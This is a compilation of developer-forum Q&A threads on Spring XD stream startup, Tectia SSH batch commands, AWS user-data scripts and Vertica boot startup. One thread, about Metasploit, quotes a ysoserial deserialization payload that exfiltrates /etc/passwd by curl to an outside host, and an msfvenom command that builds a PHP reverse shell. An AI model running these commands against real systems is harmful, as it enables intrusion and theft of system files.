Create Stream on startup/by script - spring-xd

I'm looking to create a stream on startup of a Spring XD container without having to enter it manually via xd-shell. I want to:
1. have xd-singlenode startup (invoked via bash)
2. have a pre-created stream definition (e.g. http --port=8080 | file) deployed after the container starts up
I know there's a URL to invoke (curl -X POST "http://127.0.0.1:9393/streams?name=mystream&definition=http|file") but I'm having trouble specifying additional configuration (like --port=8080), and the pipe (|) is causing trouble too.
thanks

So the answer is that you can pass stream definitions to the shell via a command file:
xd-shell --cmdFile [filename]
The contents of the command file are exactly what you would enter via the shell. So where you would do this:
xd:>stream create --name teststream --definition "http | file" --deploy
you would write a file containing this:
stream create --name teststream --definition "http | file" --deploy
So, as an example:
xd-shell --cmdFile stream.cmd
all of which can be invoked from a shell script.
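Putting both steps together, a minimal sketch of such a startup wrapper might look like the following; the $XD_HOME paths, the stream.cmd file name, and the wait-loop against the default admin port 9393 are illustrative assumptions, not from the original thread:
#!/bin/bash
# Start the single-node container in the background.
"$XD_HOME/xd/bin/xd-singlenode" &

# Wait until the admin REST endpoint answers before deploying anything.
until curl -s -o /dev/null http://127.0.0.1:9393/; do
    sleep 2
done

# Deploy the pre-created stream definitions.
"$XD_HOME/shell/bin/xd-shell" --cmdFile stream.cmd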

Also have a look at https://github.com/spring-projects/spring-xd/tree/master/src/test/scripts (you should find similar examples using curl there).
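For the REST route from the question, the pipe and the option flags need URL encoding, which curl's --data-urlencode handles for you. A hedged sketch against the endpoint shown in the question (whether a separate deploy step is also needed depends on your XD version):
curl -X POST "http://127.0.0.1:9393/streams" \
    --data-urlencode "name=mystream" \
    --data-urlencode "definition=http --port=8080 | file"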
Also note that if you are running with an external ZooKeeper ensemble, which is the operational configuration, you don't need to do this. ZK persists and restores the XD cluster state upon restart so any streams that were deployed at shutdown will be deployed at start up. Single node starts an embedded ZK server by default, but may be configured to connect to an external server. For example,
export JAVA_OPTS=-Dzk.client.connect=localhost:2181
zk.client.connect accepts a comma-delimited string of host:port pairs.
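For an external ensemble, that looks like this (host names are illustrative):
export JAVA_OPTS=-Dzk.client.connect=zk1:2181,zk2:2181,zk3:2181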

Related

SSH tectia, how to run batch commands?

I have a Tectia SSH server in a Windows environment.
When I use sftpg3 -B cmd.txt username@host, that works fine. The only problem is that it doesn't let me execute files remotely, it only lets me move files. It reads the commands from cmd.txt, but since I can't execute anything it ignores the commands.
Well, when I do the same thing but use sshg3, it doesn't recognize the -B flag at all:
SSHG3 -B cmd.txt username@host
'cmd.txt' is not recognized as an internal or external command,
operable program or batch file.
I've tried putting -B "cmd.txt".
I tried just putting the cmd.txt contents in the same script instead of housing them in cmd.txt and getting rid of -B, but it doesn't run them that way either.
The docs don't have much to go on. All they say is to use -B for batch processing.
Contents of cmd.txt:
D:
cd Library
cd Backup
parseLibrary.cmd
exit
Trying to sshg3 into a host, navigate to a path and run a batch file on that host.
Any ideas?
-B, --batch-mode
Uses batch mode. Fails authentication if it requires user interaction on the terminal.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
It does use public-key authentication; there is no user interaction needed on the terminal.
I noticed this in the docs for sftpg3:
-B [ - | batch_file ]
The -B - option enables reading from the standard input. This option is useful when you want to launch processes with sftpg3 and redirect the stdin pipes.
By defining the name of a batch_file as an attribute, you can execute SFTP commands from the given file in batch mode. The file can contain any allowed SFTP commands. For a description of the commands, see the section called “Commands”.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
I'm guessing batch file is different than batch mode?
I figured it out. You have to use the -B flag for every command you want to execute.
sshg3 user@host -B dir -B ipconfig -B etc.cmd
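Applied to the cmd.txt from the question, that pattern would look something like the line below. The paths follow the question; whether the working directory persists between separate -B commands is an assumption worth testing, so using cd /d with the full path in a single command is the safer form:
sshg3 username@host -B "cd /d D:\Library\Backup" -B parseLibrary.cmd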

How to 'pass a file' when generating a Metasploit shell?

I want to pass a file when generating a Metasploit shell. It is like this:
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=@etc/passwd axample.com" | base64
Like -F file in that example, I want to pass a file in this command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
This is the command where I want to pass a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.
As I understand it, you are using the msfvenom tool to generate a Meterpreter payload - the program that will run on the target host (in this case it will give you a command shell on the target host).
This payload is part of the Metasploit framework - a predefined program, not your custom script - and you want to pass your file to it. If so, it all depends on the Meterpreter payload's parameters, and it seems there is no option to simply pass a file to Meterpreter.
In the example with curl, the -F option is recognized by the cURL application: it stands for HTTP form posting and directs the web server to upload the file under the form field named file.
But what file path do you want to pass to the Meterpreter payload? What is your final goal? As it stands, it doesn't make much sense.
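For comparison, the curl -F mechanism on its own looks like this (the upload URL is illustrative):
curl -X POST -F "file=@/etc/passwd" http://example.com/upload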
UPDATE for your comment
curl is a different application and has its own -F option format. With msfvenom, you pass a variable such as CUSTOM1 in the following form:
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...

How do I configure the AWS instance IP during the user data configuration?

I have a question about passing a shell script to an instance with user data. What I need to configure here: since my server is going to run on the instance, the shell script should configure the server.xml information (the instance IP address, the database IP address, ...) before starting the instance/server.
But since the instance/server hasn't been created yet, is there any variable I can use to pass the localhost information into the shell script? Is there any way to specify a custom variable for the user data to use before the instance gets created? (Before using AWS user data, I used to do this manually, through the configure.sh file and the config.properties file, after the instance was created.)
#!/bin/bash
# Source the properties (defines LOCALHOST_IP and DATABASE_IP):
. ./config.properties
echo "Installation"
echo "Updating server.xml"
cd "Server/server/configuration/"
# Replace the placeholders in server.xml with the configured addresses.
sed -i "s/SERVER_IP/$LOCALHOST_IP/g" server.xml
sed -i "s/DB_IP/$DATABASE_IP/g" server.xml
cd "../tomcat/bin"
sh startup.sh
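One way to get the instance's own IP inside user data is the EC2 instance metadata service: user data runs on the instance after it boots, so the address is already assigned by then. A minimal sketch, assuming the script layout from the question (the database IP still has to come from somewhere you control, e.g. the baked-in config.properties):
#!/bin/bash
# Ask the EC2 metadata service for this instance's private IPv4 address.
LOCALHOST_IP=$(curl -s http://169.254.169.254/latest/meta-data/local-ipv4)

# DATABASE_IP comes from the baked-in properties file, as before.
. ./config.properties

sed -i "s/SERVER_IP/$LOCALHOST_IP/g" server.xml
sed -i "s/DB_IP/$DATABASE_IP/g" server.xml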

AWS Launch Configuration not picking up user data

We are trying to build an autoscaling group (let's say AS) configured with an elastic load balancer (let's say ELB) in AWS. The autoscaling group itself is configured with a launch configuration (let's say LC). As far as I could understand from the AWS documentation, pasting a script, as-is, in the user data section of the launch configuration should run that script for every instance launched into an auto scaling group associated with that launch configuration.
For example, pasting this in user data should leave a file named configure in the home folder of a t2.micro Ubuntu image:
#!/bin/bash
cd
touch configure
Our end goal is:
Increase the instances in the auto scaling group, have them launch with our startup script, and have each new instance added behind the load balancer tagged with the auto scaling group. But the script was not executed at instance launch. My questions are:
1. Am I missing something here?
2. What should I do to run our startup script at time of launching any new instance in an auto scaling group?
3. Is there any way to verify if user data was really picked up by the launch?
The direction you are following is right. What is wrong is your user data script.
Problem 1:
What you have to remember is that user data is executed as the user root, not ubuntu. So if your script had worked, you would find your file in /root/configure, NOT IN /home/ubuntu/configure.
Problem 2:
Your script is actually executing, but it's incorrect and fails at the cd command, so the file is not created.
The cd builtin without a directory argument tries to do cd $HOME; however, $HOME is NOT SET during the cloud-init run, so you have to be explicit here.
Change your script to below and it will work:
#!/bin/bash
cd /root
touch configure
You can also debug issues with your user-data script by inspecting /var/log/cloud-init.log log file, in particular checking for errors in it: grep -i error /var/log/cloud-init.log
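For question 3, you can also confirm what user data the instance actually received by querying the metadata service from the instance itself (a standard EC2 endpoint):
curl -s http://169.254.169.254/latest/user-data
On Ubuntu images, cloud-init typically also writes script output to /var/log/cloud-init-output.log, which is useful alongside the grep above.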
Hope it helps!

Start Vertica database during boot on Linux

I have Vertica installed in an Ubuntu virtual machine and I'd like to have a specific database started during boot, instead of having to log in, open admintools and start it from there.
So, is there a command line that would allow me to start it without user interaction?
In which run level should I add this?
Also, I use a specific user to run everything Vertica related, does this need to be taken into account in my boot script?
Why not just set the restart policy in admintools ("Set Restart Policy")?
You have 3 options:
Never
ksafe
always -- choose this one to start on boot.
And that is it!
admintools -t start_db
[dbadmin@hostname ~]$ admintools -t start_db --help
Usage: start_db [options]
Options:
-h, --help show this help message and exit
-d DB, --database=DB Name of database to be started
-p DBPASSWORD, --password=DBPASSWORD
Database password in single quotes
-i, --noprompts do not stop and wait for user input (default false)
-F, --force force the database to start at an epoch before data
consistency problems were detected.
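To run this at boot without user interaction, and as the dedicated Vertica user the question mentions, a boot script entry could look like the sketch below; /opt/vertica/bin is the usual install path, and the user, database name, and password are placeholders:
su - dbadmin -c "/opt/vertica/bin/admintools -t start_db -d mydb -p 'dbpassword' -i"
The -i/--noprompts flag suppresses interactive prompts, matching the help output above.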
